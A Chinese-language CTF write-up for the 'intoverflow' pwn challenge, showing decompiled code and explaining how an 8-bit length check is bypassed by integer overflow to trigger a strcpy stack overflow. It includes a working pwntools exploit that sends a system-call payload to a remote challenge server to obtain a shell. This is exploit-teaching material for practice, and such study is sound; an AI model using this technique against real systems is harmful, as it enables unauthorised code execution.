pwn----做题记录_intoverflow

做了一下午的攻防世界的题，总算快把新手区的题做完了，这里放一道有收获的题
收获是利用整数溢出

利用checksec

看一看IDA里面的东西

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp+Ch] [ebp-Ch]

  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  puts("---------------------");
  puts("~~ Welcome to CTF! ~~");
  puts("       1.Login       ");
  puts("       2.Exit        ");
  puts("---------------------");
  printf("Your choice:");
  __isoc99_scanf("%d", &v4);
  if ( v4 == 1 )
  {
    login();
  }
  else
  {
    if ( v4 == 2 )
    {
      puts("Bye~");
      exit(0);
    }
    puts("Invalid Choice!");
  }
  return 0;
}

发现有判断，直接进入login

char *login()
{
  char buf; // [esp+0h] [ebp-228h]
  char s; // [esp+200h] [ebp-28h]

  memset(&s, 0, 0x20u);
  memset(&buf, 0, 0x200u);
  puts("Please input your username:");
  read(0, &s, 0x19u);
  printf("Hello %s\n", &s);
  puts("Please input your passwd:");
  read(0, &buf, 0x199u);
  return check_passwd(&buf);
}

发现有俩个读入，而且数目很大
再次进入返回函数

char *__cdecl check_passwd(char *s)
{
  char *result; // eax
  char dest; // [esp+4h] [ebp-14h]
  unsigned __int8 v3; // [esp+Fh] [ebp-9h]

  v3 = strlen(s);
  if ( v3 <= 3u || v3 > 8u )
  {
    puts("Invalid Password");
    result = (char *)fflush(stdout);
  }
  else
  {
    puts("Success");
    fflush(stdout);
    result = strcpy(&dest, s);
  }
  return result;
}

这里就是我们要重点利用的地方，由反汇编代码，我们发现s的长度必须在3，8之间，else下有发现有栈溢出漏洞，但s不可能么大。
观察到v3是8位整数，正好可以利用整数溢出，则填入259-263的字节数即可填充s然后经过strcpy来获得shell
下面是WA

# coding=utf-8

from pwn import *
context.log_level = 'debug'    

sys_plt = 0x08048520
elf=ELF('./intoverflow')
sys_addr = elf.symbols['what_is_this']
payload = 'a'*24 + p32(sys_plt) + 'a' * 4 + p32(0x08048960)
payload = payload.ljust(260,'a') #ljust可以用a来填充payload到指定长度260

p = remote('111.200.241.244',52073)
p.sendlineafter('Your choice:','1')
p.sendlineafter('your username:','aa')
p.sendlineafter('your passwd:',payload)
p.interactive()

说一下让自己坑的地方

1. 少用'\x00'来填充，因为很多函数都是用它来作为结束的判断，在后面填充时一直不对。
2. 注意到read读取的数量，出题人好心的清理了一下区域，所以能精确读取发送的内容，自己最好也在发送内容后面加上截断。
3. 注意函数名字的变化，我一直在填充20h的s 呜呜呜u呜呜呜

以上